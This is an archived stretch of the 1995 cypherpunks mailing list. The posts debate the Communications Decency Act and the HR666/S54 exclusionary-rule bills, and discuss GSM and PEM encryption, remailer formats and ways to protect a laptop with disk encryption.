>> You leave your laptop turned on and out of your immediate reach? Geesh.
>> I would NEVER leave my laptop anywhere that I didn't have it in eyeshot. It
>> was the whole reason I got one.
>
>Well, it's rather tacky to turn off the laptop, unplug it, etc., just to
>lug it into a boardroom.  Not impressive.
>
>> > As you might imagine, I have a full suite of programming tools on the
laptop,
>> > including MS Office Pro and VB Pro, both of which are worth about $500
>> > apiece - I'd sure hate to lose them to a malicious cracker, or someone who
>> > would like a personal copy of my source code for their own use, or who just
>> > wants to "borrow" my secret key for awhile.
>> >
>> Business must be good, you are more worried about somebody stealing a $500
>> dollar program than a several thousand dollar laptop?
>
>Oh, I'm not worried about the laptop walking off, I'm worried about the
>software I've written walking off...
>

How about an obvious solution, like the password feature on After Dark?  If
I remember correctly, there's a hot-key combination you can use to bring up
the screen saver mode immediately as you get up from the machine.  It's
obviously not foolproof, but just blanking the screen and going into a
password mode would probably deter the casual browser.  If you're really
worried, change your autoexec so it goes into windows and starts AD immediately.

Low tech, maybe, but easy!

        Pat






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 9 Feb 95 09:52:02 PST
To: jpp@markv.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502072124.aa20836@hermix.markv.com>
Message-ID: <Pine.SUN.3.91.950209092021.25204A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

THIS IS A GRAMMAR FLAME.  Delete now if you don't like that sort
of thing.

Recently, several folks on this list have posted `letters to the
editor' or `letters to their representatives' that they had 
already sent or intended to send.  While most stated their case
clearly and dramatically, much of their impact was lost due to
grammar and spelling errors.  If your purpose is to persuade, 
don't shoot yourself in the foot by writing like an illiterate.

I know, I know, Net dwellers fancy themselves `above' such 
pedestrian nit picking.  The truth is, though, those who you 
intend to persuade will judge your intellect by these standards 
as much as by your content.  And in a way, they are right.  If 
you are too sloppy or lazy to write correct English, how unlikely 
is it that your thinking is equally sloppy and lazy?

In previous postings I have kept my comments to private e-mail.
I apologize to J Prime for going off on him publicly, but (a) it 
had to be someone, and (b) his posting is particularly egregious
in this regard.  (I did like *what* he said, just now *how* he
said it.)

Among ourselves, we can be less formal, but when we go public, I
think we would be a lot more effective if we had more respect for
the technical aspects of our prose.


 S a n d y

P.S.  I hope I didn't misplace any modifiers or misspell 
      anything in this post.  But if I did, please do as I
      say, not as I do.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 06:54:08 PST
To: strick@techwood.org
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502081902.LAA01787@gwarn.versant.com>
Message-ID: <199502091453.JAA26458@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


[ .. ]

No disagreements with your reply. Of course the first amendment (or the rest
of the Bill of Rights) has stopped legislators from passing restrictive laws.

The line between indecency and obscenity is vague. Legal defense fees are
not... not are opportunistic prosecutors-- which is a real problem. Look at
what happened to Jello Biafra and the Dead Kennedys if you'd like an
example. I've heard that there were recently busts in Florida of some BBS
systems that carried the alt.sex* groups while universities in the area which
also carried them weren't touched.


The "safe harbor" is 10pm, but many radio stations (like WUSB here in Stony
Brook, where I do some radio programming) use midnight as a safe time and
give periodic warnings during shows in any indecent material is aired.

Problems with these vague and-or unenforcable "decency" laws is that they
allow for selective enforcement which is often motivated more by politics
and personal greed than by their alleged concerns for decency.

> 
> In the U. S., you have a first ammendment right to indencent speech.
> 
> The question of a late-night "safe harbor" for indecent speech on the
> air is about when children are likely to be listening.  First
> ammendment rights apparently don't apply to children who are listening
> to the radio.  
> 
> Right now there is a "safe harbor" from around 10pm (or is it 9pm?)
> thru 6am, but this changes regularly, usually as a result of "case law"
> (someone being prosecuted under next month's rules, not this month's)
> 
> 				strick
> 

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 06:58:53 PST
To: cme@tis.com (Carl Ellison)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502082149.AA28226@tis.com>
Message-ID: <199502091458.JAA26730@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> >Date: Tue, 7 Feb 95 21:24:01 PST
> >From: jpp@markv.com
> 
> >of the very most important rights.  To hold the owner of a buliten
> >board responsible for the illegal messages posted to it, is to force
> >the buliten board owner to become a government censor in all but name
> >(and wages).
> 
> anyone heard of "no unfunded mandates" ?

It's not a mandate. It's an order from god. (As if you didn't know, it
says in the bible that the Republican party is his official mouthpiece.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 9 Feb 95 06:58:55 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: MIME based remailing commands
In-Reply-To: <199502090425.UAA24521@largo.remailer.net>
Message-ID: <9502091458.AA11554@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: "Perry E. Metzger" <perry@imsi.com>
> 
>    xpat@vm1.spcs.umn.edu says:
>    > IMHO, an ideal message would have the ability to handle nested objects
>    > of varying types, MIME is only a start.
> 
>    What is it precisely that you might want to encapsulate that MIME
>    can't encapsulate?
> 
> Perry, you're missing the whole point, just like the exchange a few
> days about a remailer format standard.

If I am missing the whole point, it is because people are being
extremely vague about stating the point. This is engineering, not
social science. One specifies things precisely, as in "I think MIME
can't specify how to encapsulate a sound file", or "I think MIME
doesn't have the right headers defined to specify how long a mail
message is to be delayed". This fuzzy-engineering might feel good to
some of you but from my perspective it does nothing to enhance the
information content fo the discussion.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 07:02:48 PST
To: samman@CS.YALE.EDU (Ben)
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <199502091502.KAA27022@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 8 Feb 1995, root wrote:
> 
> > Hi all,
> > 
> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegaly if they 'believed'
> > that it was collected in good faith.
> 
> This sounds like a spoof.  Look at the number.

I heard yesterday that someone in the House of Representatives proposed an
amendment to the new crime bill which was soundly defeated it. Turns out the
Amendment was worded exactly as the Fourht Amendment in the Bill 'o Rights.
Apparently many a congressman/woman has egg on their face...
> 
> Ben.
> 
> 
Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 9 Feb 95 02:12:00 PST
To: ethridge@netcom.com
Subject: Re: The drumbeat against anonymity continues....
Message-ID: <9502091009.AA03503@pero>
MIME-Version: 1.0
Content-Type: text/plain


Allen B. Ethridge wrote:

> The technology to reduce cellular fraud, through encryption and
> authentication, is easily implementable, but for some reason neither
> the operating companies nor the manufacturers want it.
> 
> In contrast, European cellular (GSM) products do implement
> encryption and authentication (at least as far as laws allow).
> GSM mobile phones can be equipped with a slot for a card that
> identifies the subscriber.  Billing is based on the subscriber's
> identity, not the phone's.

Actually, all GSM phones use a smart card to ID the subscriber.
There was at one point the idea that this card would be useful
for other things, e.g. you could plug it into a fixed line
phone and have that phone take on your personal number, or even
use it as a payment card. However, the desire for ever smaller
phones means that the credit card form factor is dying out for SIM
cards, and one doesn't want to keep popping a 0.5" x 1" mini-SIM
out of the bowels of the phone.

GSM uses less than strong encryption, by the way. I forget the
technical details, but it is of the level that governments can
fairly readily crack, but beyond the reach of most private
organisations. (So no more 'Squidgy-gate'). It would, however,
be quite feasible to add additional second stage encryption
to phones (since the dataflow is digital point-point). I wonder
if Nokia, a Finnish company well outside the scope of COCOM,
might offer a feature like this.

Incidentally, is there likely to be any adoption of GSM
in the US in the near future?

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Thu, 9 Feb 95 07:10:31 PST
To: cypherpunks@toad.com
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502091502.KAA27022@libws4.ic.sunysb.edu>
Message-ID: <Pine.SUN.3.91.950209100901.12976A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> > On Wed, 8 Feb 1995, root wrote:
> > 
> > > Hi all,
> > > 
> > > A friend advises me that today House Bill 666 passed. This supposedly would
> > > allow police officers to use evidence collected illegaly if they 'believed'
> > > that it was collected in good faith.
> > 
> > This sounds like a spoof.  Look at the number.

I regret that my previous hope was dead wrong.

There's  front page story on it in today's NYT.  Hopefully for those of 
you that are NYT challenged, maybe John Young will make it available as 
per his usual gracious self.

Shit!

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:49:22 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain



In article <199502090413.UAA24481@largo.remailer.net>, eric@remailer.net writes:
>    From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
> 
>    You are right here. However, our observation is that an interesting
>    chunk of the world is moving towards using X.509 based certificate
>    infrastructures for many things.
> 
> It's that interesting chunk that RSADSI is pointing out to you.  When
> you see the world through the eyes of a vendor ...

Actually we are getting strong interest from almost everybody but RSA.
I imagine that RSA may have some plans in this area, but what they are
is unknown to me.

> And you know, of course, that PEM really stands for Patent Extension
> Mechanism.

Har! Besides the certificate problems, are there other problems with
PEM that have prevented its adoption?

> I don't really blame you much.  I mean TIPEM handles all the X.509
> stuff just fine and PGP can't get out even the simplest of libraries,
> or even a partial library.

Our implementation supports this X.509 stuff as well. We don't have a
DUA yet though...

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Thu, 9 Feb 95 08:06:21 PST
To: cypherpunks@toad.com
Subject: Re: Cooperation
In-Reply-To: <9502071321.AA19736@cfdevx1.lehman.com>
Message-ID: <fbZElKJXYHRU078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain



I would think that MIME support would be extremely important to some
of the overall goals of the remailer net, i.e. popularity and off-shore
remailers.  Now, I'm not that familiar with MIME, but I believe it
has much better support (that is, it has some) for the extended character
sets that are needed for many languages.

The remailers as the stand today, are great as long as you don't want
to send a message in Chinese, Russian, etc.

As far as RFCs, I think documenting the current remailer system then
the new version is a good idea.  The current system can be done now,
done faster, and provide a better understanding for others who can
then add to the discussion for the next version.

--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 07:52:27 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502091453.JAA26458@libws4.ic.sunysb.edu>
Message-ID: <Pine.LNX.3.91.950209105014.8284B-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> The line between indecency and obscenity is vague. Legal defense fees are
> not... not are opportunistic prosecutors-- which is a real problem. Look at
> what happened to Jello Biafra and the Dead Kennedys if you'd like an
> example. I've heard that there were recently busts in Florida of some BBS
> systems that carried the alt.sex* groups while universities in the area which
> also carried them weren't touched.

This is part of the danger. It to omse degree doesn't matter how 
restictive or "enforceable" the law might be, or even whether or not 
prosecutins will stick. Arrests and prosecutions will take a financial 
toll on those targetted, and will create a chillinf effect in the online 
community, meaning sysops and BBS operators will start policing 
themselves too severely in an effort to avoid politcial or legal scrutiny.

> The "safe harbor" is 10pm, but many radio stations (like WUSB here in Stony
> Brook, where I do some radio programming) use midnight as a safe time and
> give periodic warnings during shows in any indecent material is aired.

Unfortunately, this only works for media which operate within the old 
broadcast paradigm, while the online world operates within the network 
paradigm. There are no hours in which it is safe to broadcast because 
there is no "broadcast" in the tradition sense.

> Problems with these vague and-or unenforcable "decency" laws is that they
> allow for selective enforcement which is often motivated more by politics
> and personal greed than by their alleged concerns for decency.

And is also, as stated above, often motivated out of a desire to force 
the public to overly-police themselves to avoid prosecution.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Thu, 9 Feb 95 10:58:57 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SUN.3.91.950209092021.25204A-100000@crl.crl.com>
Message-ID: <9502091057.aa19104@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy, and other C'punks,

THIS IS A RESPONSE TO A GRAMMAR FLAME.  But not, I hope, a flame
itself.

I respect your opinion, Sandy, and am glad you like what I wrote.  And I
certainly don't take your grammar 'flame' personally.  In fact, I
_agree_ with what you have said.  But for one thing -- one of my
points was to rub their noses in a particularly stinky example of
stegnography.  What secret messages are concealed in my letter?  Can
anyone know?  That was an essential point to my letter.

In retrospect I would change the analogy from parking lots to mail
carriers.  (Does it make sense for a mail carrier to be held liable
for the 'bad' mail they happen to deliver?)  I would also probably
point out that the internet community standard for what is obscene is
awfully loose, and seems to focus mainly on a brand of pork meat
product. ;)

I just got off the phone with my 'representatives.'  Perhaps calling
them doesn't have the same impact that a letter does, but it is very
immediately gratifying.

j(who _can_ drive a spelling checker)'

P.S.  Yes, you made an error in your post :).  If you will proof my
letters to my reps I will proof yours.  Deal?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 07:59:22 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502091502.KAA27022@libws4.ic.sunysb.edu>
Message-ID: <Pine.LNX.3.91.950209105922.8309A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> I heard yesterday that someone in the House of Representatives proposed an
> amendment to the new crime bill which was soundly defeated it. Turns out the
> Amendment was worded exactly as the Fourht Amendment in the Bill 'o Rights.
> Apparently many a congressman/woman has egg on their face...

Yes indeed, in response to the H666 bill. The Dems placed up for vote the 
text of the 4th Amendment without attributing it to be such. It was 
defeated. Dems then immediately took to the floor of the House accusing 
the Repubs of tryingto dismantle the Constitution.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Date: Thu, 9 Feb 95 08:15:31 PST
To: samman@CS.YALE.EDU (Ben)
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <9502091615.AA13172@hibbs.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ben originally said the following...
> 
> On Wed, 8 Feb 1995, root wrote:
> 
> > Hi all,
> > 
> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegaly if they 'believed'
> > that it was collected in good faith.
> 
> This sounds like a spoof.  Look at the number.

Nope... wish it was... but I saw it pass on C-SPAN.  Boy was I
pissed.
Looks like it's time to make a 2048 bit PGP key.  *8)


-----------------------------------------------------------------------------
Greg Morgan <mac5tgm@hibbs.vcu.edu>    | "I dunno Brain, me and Pipi
Mail me for PGP Key: 0xE0D222A9        |  Longstocking?  I mean what would
Key Fingerprint : 2430 BAA4 1EE4 AA2F  |  the children look like?" - Pinki
                  3B76 3516 3DEF 5529  |
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Date: Thu, 9 Feb 95 08:40:50 PST
To: ecarp@netcom.com
Subject: Re: Best encryption device driver for MS-DOS?
In-Reply-To: <m0rcYxl-0004IOC@s116.slcslip.indirect.com>
Message-ID: <9502091640.AA16231@hibbs.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp [khijol Sysadmin] originally said the following...

> apiece - I'd sure hate to lose them to a malicious cracker, or someone who
> would like a personal copy of my source code for their own use, or who just
> wants to "borrow" my secret key for awhile.

"Is that a PGP key in your pocket or are you just happy to see
me?" :)

The best way I can think of to protect your secret key is to
store it off of your laptop.  Put it on a floppy disk or a
PCMCIA card and keep the sucker in your pocket or in a safe.

> What do people recommend as the solution for this?  Some sort of IDEA-based
> or triple-DES-based device driver would seem to be the answer to this, but
> I'm not sure which is the "best" (most reliable, fastest, easiest to set up)
> one to use.  I like the sound of Michael Sattler's encryption driver for the
> Mac, but alas, I'm running MS-DOS :(

There's a program for DOS called SecureDrive (I think) that
uses IDEA encryption to protect hard drives.
Only problem you'll have is you'll have to repartition your
hard drive.  This is because the bootable partition needs to be
unencrypted.

What I'd setup is a small partition that's bootable and has a
version of DOS installed on it.  Then I would keep all the
software/data you want to protect on the much larger encrypted
partition.

Another thing I'd note is that while it works great with
uncompressed hard drives and floppies, I'm not certain that it
would work or work safely with compressed drives.  I haven't
tried it yet.

I'm at my school's computer lab so I can't dig up a copy of it
yet (or remember where the FTP site I got it from) but if you
want I'll try to track it down for you (if it hasn't been
posted here already).
-----------------------------------------------------------------------------
Greg Morgan <mac5tgm@hibbs.vcu.edu>    | "I dunno Brain, me and Pipi
Mail me for PGP Key: 0xE0D222A9        |  Longstocking?  I mean what would
Key Fingerprint : 2430 BAA4 1EE4 AA2F  |  the children look like?" - Pinki
                  3B76 3516 3DEF 5529  |
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 9 Feb 95 08:49:37 PST
To: cypherpunks@toad.com
Subject: Senate Version of HR666 (fwd)
Message-ID: <Pine.SOL.3.90.950209114334.2474A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


It is still *theoretically* possible to stop the legislative
revocation of the 4th amendment, if you believe we have a 
representative government.

Brad D.

---------- Forwarded message ----------
Date: 9 Feb 1995 11:14:58 U
From: Cooley Stephen <cooley_stephen@space.honeywell.com>
To: UWSA <uwsa@shell.portal.com>, baron_mark_a@smtpmm.space.honeywell.com,
    Bostock#m#_Craig_W.FL40-P02@smtpmm.space.honeywell.com,
    Kidd_Lee.FL51-P03@smtpmm.space.honeywell.com
Subject: Senate Version of HR666

S54 - the Senate version of HR666 subverts the 4th Amendment!

   I called Sen Mack's (R-FL) DC office this morning for info on S54.  This
bill has been submitted to the Senate Judiciary Committee for consideration.
Hearings for S3-The "New" Crime bill, are scheduled for Fed 15th.  The new
crime bill also has a Exclusionary Evidence section too.  I have appended this
section after S54 below.    No hearings for S54 are scheduled as of yet.  The
aid I talked to didn't know if any hearings on S54 would even occur before it
is passed onto the floor for a vote.  The committe could mark up the bill and
pass it on without hearings.

  Please pass this info onto other groups and reflectors.  We have to get the
word out on this bill. S54 modifies the requirements of the 4th amendment to

          ".....if the search or seizure was undertaken in an objectively 
          reasonable belief that it was in conformity with the fourth
          amendment."

Given the court rulings allowing traffic stops and searches due to an officer's
descretion, "probably cause", S54 hammers another nail into the 4th Amendment
coffin.  Call your Senators and let them know your thoughts on this bill. 
There is no time to waste.

FILE s54.is
          S 54 IS
          104th CONGRESS
          1st Session

          To amend title 18 to limit the application of the exclusionary rule.

                           IN THE SENATE OF THE UNITED STATES
                                     January 4, 1995

          Mr. Thurmond introduced the following bill; which was read twice 
              and referred to the Committee on the Judiciary

                                         A BILL

          To amend title 18 to limit the application of the exclusionary rule.

            Be it enacted by the Senate and House of Representatives of the
          United States of America in Congress assembled, That this Act may 
          be cited as the `Exclusionary Rule Limitation Act of 1995'.

            Sec. 2. (a) Chapter 223 of title 18, United States Code, is
          amended by adding the following two sections:

          `Sec. 3508. Limitation of   the fourth amendment exclusionary rule
            `Evidence which is obtained as a result of a search or seizure
          shall not be excluded in a proceeding in a court of the United
          States on the ground    that the search or seizure was in violation
          of the fourth amendment  to the Constitution of the United States,
          if the search or seizure was undertaken in an objectively 
          reasonable belief that it was in conformity with the fourth
          amendment. A showing that evidence was obtained pursuant to and
          within the scope of a warrant constitutes prima facie evidence of
          such a reasonable belief, unless the warrant was obtained through
          intentional and material misrepresentation.

          `Sec. 3509. General limitation of the exclusionary rule
            `Except as specifically provided by statute or rule of procedure,
          evidence which is otherwise admissible shall not be excluded in a
          proceeding in a court of the United States on the ground that the
          evidence was obtained in violation of a statute or rule of
          procedure, or of a regulation issued pursuant thereto.'.
            (b) The table of sections of chapter 223 of title 18, United
          States Code, is amended by adding at the end thereof:

          `3508. Limitation of the fourth amendment exclusionary rule.
          `3509. General limitation of the exclusionary rule.


Exclusionary Evidence section in the new crime bill S3:


          SEC. 507. ADMISSIBILITY OF CERTAIN EVIDENCE.

          `Sec. 3502A. Admissibility of evidence obtained by search or seizure

            `(a) Evidence Obtained by Objectively Reasonable Search or
          Seizure: Evidence obtained as a result of a search or seizure that
          is otherwise admissible in a Federal criminal proceeding shall not
          be excluded in a proceeding in a court of the United States on the
          ground that the search or seizure was in violation of the fourth
          amendment to the Constitution.
            `(b) Evidence Not Excludable by Statute or Rule: Evidence shall
          not be excluded in a proceeding in a court of the United States on
          the ground that it was obtained in violation of a statute, an
          administrative rule, or a rule of court procedure unless exclusion
          is expressly authorized by statute or by a rule prescribed by the
          Supreme Court pursuant to chapter 131 of title 28.
            `(c) Rule of Construction: This section shall not be construed to
          require or authorize the exclusion of evidence in any proceeding.'.
                (2) Technical amendment: The chapter analysis for chapter 223
              of title 18, United States Code, is amended by inserting after
              the item for section 3502 the following new item:
          `3502A. Admissibility of evidence obtained by search or seizure.'.
            (c) Illegal Search and Seizure: 
                (1) In general: Title 28, United States Code, is amended by
              inserting after chapter 171, the following new chapter:










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 9 Feb 95 12:33:43 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502090633.WAA08858@netcom2.netcom.com>
Message-ID: <199502092033.MAA25822@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@netcom.com (Timothy C. May)

   Unlike the
   Digital Telephony Bill, which was on greased skids, [...]

As far as I have been able to puzzle out, the source of this claim
were the same parties that wanted to work a "compromise".  I have
never really trusted its veracity.

There was lobbying by the FBI, to be sure, but was there not also
lobbying for previous such bills (including S.266)?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 9 Feb 95 09:55:25 PST
To: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Subject: Re: S. 314 and existing situation
In-Reply-To: <199502090439.UAA23399@mail.igc.apc.org>
Message-ID: <Pine.SUN.3.91.950209125321.25320B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Richard F. Dutcher wrote:

> Gee, fellas, looking over this bill, *most* of what's going on is
> just porting existing telephone law over to cybercomm. Given the
> existence of 900-sex-talk, the phone companies are clearly not being
> held responsible for content.

Doesn't the common carrier status of RBOCs give them protection from 
this?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Feb 95 10:02:37 PST
To: cypherpunks@toad.com
Subject: NYT on HR666
Message-ID: <199502091801.NAA11707@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Katherine Seelye writes on Page One today about House passage 
of the new Search and Seizure bill.


It covers a parallel revision of appeals of the death penalty.  
And notes on abusive BATF.


For email copy send blank message to <jya@pipeline.com> with 
subject:   666_zap





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 9 Feb 95 10:39:42 PST
To: kipp@warp.mcom.com (Kipp E.B. Hickman)
Subject: Re: skronk
In-Reply-To: <3hdlgr$35a@flop.mcom.com>
Message-ID: <9502091838.AA12032@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Kipp E.B. Hickman says:
> Har! Besides the certificate problems, are there other problems with
> PEM that have prevented its adoption?

Its kind of ugly, too. The new PEM-MIME stuff should do much better,
but its no longer really PEM per se. Look at the drafts if you are
interested. 

> > I don't really blame you much.  I mean TIPEM handles all the X.509
> > stuff just fine and PGP can't get out even the simplest of libraries,
> > or even a partial library.
> 
> Our implementation supports this X.509 stuff as well. We don't have a
> DUA yet though...

Just so you know, Kipp, there is no real support for X.500 directories
over the internet, and there never will be. No one likes the things
outside of fogeys in MIS departments who program in Cobol.
Certificates as currently envisioned by the IETF are probably
going to be stored in the DNS.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 11:01:54 PST
Subject: Re: S. 314 and existing situation
In-Reply-To: <Pine.SUN.3.91.950209125321.25320B-100000@thrash.src.umd.edu>
Message-ID: <Pine.LNX.3.91.950209140130.8757A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Thomas Grant Edwards wrote:

> On Wed, 8 Feb 1995, Richard F. Dutcher wrote:
> 
> > Gee, fellas, looking over this bill, *most* of what's going on is
> > just porting existing telephone law over to cybercomm. Given the
> > existence of 900-sex-talk, the phone companies are clearly not being
> > held responsible for content.
> 
> Doesn't the common carrier status of RBOCs give them protection from 
> this?

Hard to tell from this bill what the deal is on this. Common carriers 
aren;t completely immune from prosecution or lawsuit or whatnot to begin 
with. But in addition, S.314 introduces "transmit or otherwise make 
available" into the language of the law. Which makes the -carrier- of the 
"offending" information responsible.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 9 Feb 95 11:11:25 PST
To: cypherpunks@toad.com
Subject: PEM
Message-ID: <9502091907.AA13921@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Har! Besides the certificate problems, are there other problems with
> PEM that have prevented its adoption?

That's it.

PEM "blew it" by relying on Internet-wide X.500/X.509 deployments.

They're now looking at self-signed certificates as a transition aide
to work around the adoption problems, particular in face of the pressure
brought by the success of PGP.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 9 Feb 95 14:17:09 PST
To: cypherpunks@toad.com
Subject: LESM - Link Encrypted Session Manager
Message-ID: <199502092216.AA09906@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3926.1071713479.multipart/mixed"

--Boundary..3926.1071713479.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----

I finished hacking Matt's ESM to do link encryption yesterday, but 
for some reason the mail I sent to cypherpunks didn't get echoed back 
to me, so I'm sending this again.

To install: get ESM and RSAREF, make sure you can compile ESM, 
then replace the esm.c with my hacked version and recompile.

To use: same as ESM, but there's an extra option "-b bandwidth", the 
default is 100 cps.

I've attached the modified esm.c here since it doesn't include any 
crypto code.  To get ESM, write to cfs@research.att.com and state the 
following:

	- you are in the US or Canada, and
	- you are a US or Canadian citizen or legal permanent
	  resident, and
	- You've read and understand the license and export
	  conditions.

RSAREF is in ftp://rsa.com/rsaref/

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzqTtTl0sXKgdnV5AQEmbgP8CRxE+RCGsDXwwShWhZKGytSywyWZ8RXB
RPBHZmk6UgdpCR2VVo8wXjcPuEv4SHp9ZjhFTq53JZ/s3YcV5FxF33/ivSlh1Ra4
P8GSYnoEaIJoFrJyagukbBUaY6zWCx0PcnsLoVArCxujwRYwfrQvHdiNx13z7bJh
OSEhhoE9djg=
=PY8P
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?

This message contains a file prepared for transmission using the
MIME BASE64 transfer encoding scheme. If you are using Pegasus
Mail or another MIME-compliant system, you should be able to extract
it from within your mailer. If you cannot, please ask your system
administrator for help.

   ---- File information -----------
     File:  lesm.c
     Date:  8 Feb 1995, 23:57
     Size:  19769 bytes.
     Type:  Text


--Boundary..3926.1071713479.multipart/mixed
